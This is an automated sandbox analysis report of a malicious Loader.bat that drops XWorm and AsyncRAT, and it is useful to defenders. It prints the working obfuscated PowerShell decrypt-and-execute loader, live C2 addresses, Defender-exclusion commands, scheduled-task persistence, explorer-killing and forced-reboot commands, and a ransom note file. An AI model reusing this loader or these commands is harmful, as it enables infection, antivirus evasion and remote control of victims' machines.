Analysis

  • max time kernel
    244s
  • max time network
    247s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-07-2024 13:55

Errors

Reason
Machine shutdown

General

  • Target

    Loader.bat

  • Size

    192KB

  • MD5

    a94e4dec22b09ea37e33fdfa3638e5de

  • SHA1

    f90c1ea98c741bc63a3260721d1974962b9241ce

  • SHA256

    bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4

  • SHA512

    a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b

  • SSDEEP

    3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c

Malware Config

Extracted

Family

xworm

C2

unique-emotions.gl.at.ply.gg:54742

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

card-buzz.gl.at.ply.gg:2497

Mutex

rotrzgmheqhT

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:3672
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Users\Admin\AppData\Local\Temp\Update.exe
          "C:\Users\Admin\AppData\Local\Temp\Update.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3172
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4076
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1604
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
            4⤵
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:19012
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8795046f8,0x7ff879504708,0x7ff879504718
              5⤵
                PID:4564
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                5⤵
                  PID:2984
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1308
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
                  5⤵
                    PID:2096
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                    5⤵
                      PID:14096
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                      5⤵
                        PID:19276
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:8
                        5⤵
                          PID:19592
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,8000728312999926716,16361211414879826028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 /prefetch:8
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:19764
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:20440
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:19584
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:19528
                      • C:\Windows\SYSTEM32\taskkill.exe
                        taskkill /F /IM explorer.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2896
                      • C:\Windows\SYSTEM32\shutdown.exe
                        shutdown.exe /f /r /t 0
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:20068
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 83688
                      3⤵
                      • Program crash
                      PID:4864
                • C:\Users\Admin\AppData\Roaming\Update.exe
                  C:\Users\Admin\AppData\Roaming\Update.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:19004
                • C:\Users\Admin\AppData\Roaming\Update.exe
                  C:\Users\Admin\AppData\Roaming\Update.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:19260
                • C:\Windows\System32\CompPkgSrv.exe
                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                  1⤵
                    PID:19164
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:19036
                    • C:\Users\Admin\AppData\Roaming\Update.exe
                      C:\Users\Admin\AppData\Roaming\Update.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:20260
                    • C:\Windows\system32\AUDIODG.EXE
                      C:\Windows\system32\AUDIODG.EXE 0x524 0x4cc
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:19320
                    • C:\Users\Admin\AppData\Roaming\Update.exe
                      C:\Users\Admin\AppData\Roaming\Update.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:13840
                    • C:\Windows\system32\LogonUI.exe
                      "LogonUI.exe" /flags:0x4 /state0:0xa3903855 /state1:0x41c64e6d
                      1⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious use of SetWindowsHookEx
                      PID:2976
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2844 -ip 2844
                      1⤵
                        PID:20000

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

                        Filesize

                        654B

                        MD5

                        2ff39f6c7249774be85fd60a8f9a245e

                        SHA1

                        684ff36b31aedc1e587c8496c02722c6698c1c4e

                        SHA256

                        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                        SHA512

                        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                        Filesize

                        152B

                        MD5

                        a499254d6b5d91f97eb7a86e5f8ca573

                        SHA1

                        03dbfebfec8c94a9c06f9b0cd81ebe0a2b8be3d1

                        SHA256

                        fb87b758c2b98989df851380293ff6786cb9a5cf2b3a384cec70d9f3eb064499

                        SHA512

                        d7adcc76d0470bcd68d7644de3c8d2b6d61df8485979a4752ceea3df4d85bd1c290f72b3d8d5c8d639d5a10afa48d80e457f76b44dd8107ac97eb80fd98c7b0c

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                        Filesize

                        152B

                        MD5

                        bafce9e4c53a0cb85310891b6b21791b

                        SHA1

                        5d70027cc137a7cbb38f5801b15fd97b05e89ee2

                        SHA256

                        71fb546b5d2210a56e90b448ee10120cd92c518c8f79fb960f01b918f89f2b00

                        SHA512

                        c0e4d3eccc0135ac92051539a18f64b8b8628cfe74e5b019d4f8e1dcbb51a9b49c486a1523885fe6be53da7118c013852e753c26a5490538c1e721fd0188836c

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                        Filesize

                        6KB

                        MD5

                        2e354814aff666d24b1e092a0e15f5e1

                        SHA1

                        98314512919713a2cfb2ff44f2e650aa7da43ae7

                        SHA256

                        bd9744d0e24498200b8716b1f0ef77709af446fa618ece614898197cb1876dc2

                        SHA512

                        bf5cf417d930165c1b3abc1be6b73a7f2aa451d519b7c7309fe1cfe0cf419813575b5de3dec6dfeb3791cc03ded111213d453c1e4a8b5afd22f4075a185c641e

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                        Filesize

                        6KB

                        MD5

                        676a02dd4daaec7be0f329fc0883ef95

                        SHA1

                        b866b56ec113f6b934d7093ed830d13d7ff7e09f

                        SHA256

                        55addb76f39d850d272f1d884f3ec88af8e688f6c8f65c67f90f7b3707f312b4

                        SHA512

                        629805682018e6e4f7576f6976fd142d80d26fd31000801a65c2ef846487865c8e896e566b6e4530d9cec02bf9a7fada7fc1025f9ad6ff4530354a9697fc8801

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                        Filesize

                        16B

                        MD5

                        6752a1d65b201c13b62ea44016eb221f

                        SHA1

                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                        SHA256

                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                        SHA512

                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                        Filesize

                        11KB

                        MD5

                        eda47a9614ab02bf7bc5ed746fb87ced

                        SHA1

                        de483e24c1f0ab29937128bae2be96abfe46fd5f

                        SHA256

                        ed634e5db23f4b0882ef8a2d9b4cff4a55c2a37b361d540b76f1f1f95db43b26

                        SHA512

                        838c9110f5ba56c4ebebaff7374947661e658ce96411734b5d1b4471ded25a9d67c3b749f67346b7b64cc90414e1ec2f972ef8add865923e453c5a2520de79f4

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                        Filesize

                        264KB

                        MD5

                        f50f89a0a91564d0b8a211f8921aa7de

                        SHA1

                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                        SHA256

                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                        SHA512

                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        3a1e249212d4af8ee7f335a5dfd075ba

                        SHA1

                        8ab2019e5d1376124bd79b822b9b1d4a794de076

                        SHA256

                        046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa

                        SHA512

                        8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        948B

                        MD5

                        c1a54dd5a1ab44cc4c4afd42f291c863

                        SHA1

                        b77043ab3582680fc96192e9d333a6be0ae0f69d

                        SHA256

                        c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

                        SHA512

                        010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

                      • C:\Users\Admin\AppData\Local\Temp\Update.exe

                        Filesize

                        59KB

                        MD5

                        07ac8571846ca0cc9f6fcdbe1d000be2

                        SHA1

                        3cbe16f7d24d40b590f97b1999c64c5bb889e8c6

                        SHA256

                        2a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5

                        SHA512

                        56413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbucmbp0.kx2.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A12EFCF326EF474CB6F8D2D8326C18EA.dat

                        Filesize

                        940B

                        MD5

                        327c6861fe1331f8387f06c2754f74c2

                        SHA1

                        3ebb3551dfe005d0bc6368d1b7e2e50f01290629

                        SHA256

                        7a4f8fa033dc22fe00ef62928000259d293199c7ae33c00afe62484f374dca92

                        SHA512

                        cd86aa64036214b44137aabbdad86269999b44a48d846e8a6011035a5284d7ba043942a42daea5d8f2658775edee0f663e8c50f8c016fba3e53b5adbc76b39b2

                      • C:\Users\Admin\Desktop\How To Decrypt My Files.html

                        Filesize

                        723B

                        MD5

                        553cf6c7e10d1c701098d7e1d0a01839

                        SHA1

                        3cbdf41c6d02de51754a2696a382485be5175771

                        SHA256

                        bfbb59fa451071b37088b6286c3e5941f2536c4d9a1b77c1c6e987da9545b6ae

                        SHA512

                        591ace58027c743e663598f29857e3fa52e47e5a015dfb5e46570fcc563b623306b6e9de5df0aed2f5242c7ae88178aced6c909ec3b8c075b5d7239922d3183c

                      • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

                        Filesize

                        16B

                        MD5

                        50714cb8845c9eadfec7d3cccf421dc5

                        SHA1

                        6d9c00dbe17ee1b30c654ec804c4b71d31d6d356

                        SHA256

                        205e016904fcf9b58ab35c8d74a8919e29676d10cadb35439007a256041c2288

                        SHA512

                        7866ccb665b3d0847feb3f33a5d7b3c6a70ade281f7eff6a76a5c49c668d4a930c6802a57addd551f9a962752e52db0b28c80b1e173cb89f097e1af5c93cfbaf

                      • memory/2788-98-0x0000000002A30000-0x0000000002A3C000-memory.dmp

                        Filesize

                        48KB

                      • memory/2788-97-0x000000001B5F0000-0x000000001B600000-memory.dmp

                        Filesize

                        64KB

                      • memory/2788-105-0x0000000000FB0000-0x0000000000FBC000-memory.dmp

                        Filesize

                        48KB

                      • memory/2788-39-0x00007FF869223000-0x00007FF869225000-memory.dmp

                        Filesize

                        8KB

                      • memory/2788-40-0x0000000000960000-0x0000000000976000-memory.dmp

                        Filesize

                        88KB

                      • memory/2788-96-0x00007FF869223000-0x00007FF869225000-memory.dmp

                        Filesize

                        8KB

                      • memory/2788-87-0x000000001B5F0000-0x000000001B600000-memory.dmp

                        Filesize

                        64KB

                      • memory/2788-397-0x0000000000FD0000-0x0000000000FDA000-memory.dmp

                        Filesize

                        40KB

                      • memory/2788-411-0x000000001DEC0000-0x000000001DECA000-memory.dmp

                        Filesize

                        40KB

                      • memory/2788-91-0x000000001CFC0000-0x000000001CFCE000-memory.dmp

                        Filesize

                        56KB

                      • memory/2844-22-0x00000000074B0000-0x0000000007B2A000-memory.dmp

                        Filesize

                        6.5MB

                      • memory/2844-0-0x000000007488E000-0x000000007488F000-memory.dmp

                        Filesize

                        4KB

                      • memory/2844-77-0x0000000008180000-0x0000000008724000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/2844-89-0x000000007488E000-0x000000007488F000-memory.dmp

                        Filesize

                        4KB

                      • memory/2844-90-0x0000000074880000-0x0000000075030000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2844-76-0x0000000007B30000-0x0000000007BCC000-memory.dmp

                        Filesize

                        624KB

                      • memory/2844-92-0x00000000073E0000-0x00000000073EE000-memory.dmp

                        Filesize

                        56KB

                      • memory/2844-93-0x0000000007E70000-0x0000000007E8E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2844-94-0x0000000008040000-0x00000000080D2000-memory.dmp

                        Filesize

                        584KB

                      • memory/2844-95-0x0000000074880000-0x0000000075030000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2844-414-0x0000000074880000-0x0000000075030000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2844-28-0x00000000070E0000-0x00000000070F2000-memory.dmp

                        Filesize

                        72KB

                      • memory/2844-25-0x0000000006F80000-0x0000000006FAC000-memory.dmp

                        Filesize

                        176KB

                      • memory/2844-24-0x0000000006F60000-0x0000000006F68000-memory.dmp

                        Filesize

                        32KB

                      • memory/2844-23-0x0000000006E50000-0x0000000006E6A000-memory.dmp

                        Filesize

                        104KB

                      • memory/2844-78-0x0000000072015000-0x0000000072016000-memory.dmp

                        Filesize

                        4KB

                      • memory/2844-21-0x0000000006DB0000-0x0000000006E26000-memory.dmp

                        Filesize

                        472KB

                      • memory/2844-20-0x0000000005EA0000-0x0000000005EE4000-memory.dmp

                        Filesize

                        272KB

                      • memory/2844-19-0x0000000005E50000-0x0000000005E9C000-memory.dmp

                        Filesize

                        304KB

                      • memory/2844-18-0x0000000005AB0000-0x0000000005ACE000-memory.dmp

                        Filesize

                        120KB

                      • memory/2844-17-0x0000000005720000-0x0000000005A74000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/2844-16-0x00000000055A0000-0x0000000005606000-memory.dmp

                        Filesize

                        408KB

                      • memory/2844-15-0x00000000054C0000-0x0000000005526000-memory.dmp

                        Filesize

                        408KB

                      • memory/2844-10-0x0000000005420000-0x0000000005442000-memory.dmp

                        Filesize

                        136KB

                      • memory/2844-4-0x0000000074880000-0x0000000075030000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2844-3-0x0000000074880000-0x0000000075030000-memory.dmp

                        Filesize

                        7.7MB

                      • memory/2844-2-0x0000000004C80000-0x00000000052A8000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/2844-1-0x0000000004600000-0x0000000004636000-memory.dmp

                        Filesize

                        216KB

                      • memory/2844-413-0x00000000545B0000-0x000000005482E000-memory.dmp

                        Filesize

                        2.5MB

                      • memory/3172-43-0x00000147F1110000-0x00000147F1132000-memory.dmp

                        Filesize

                        136KB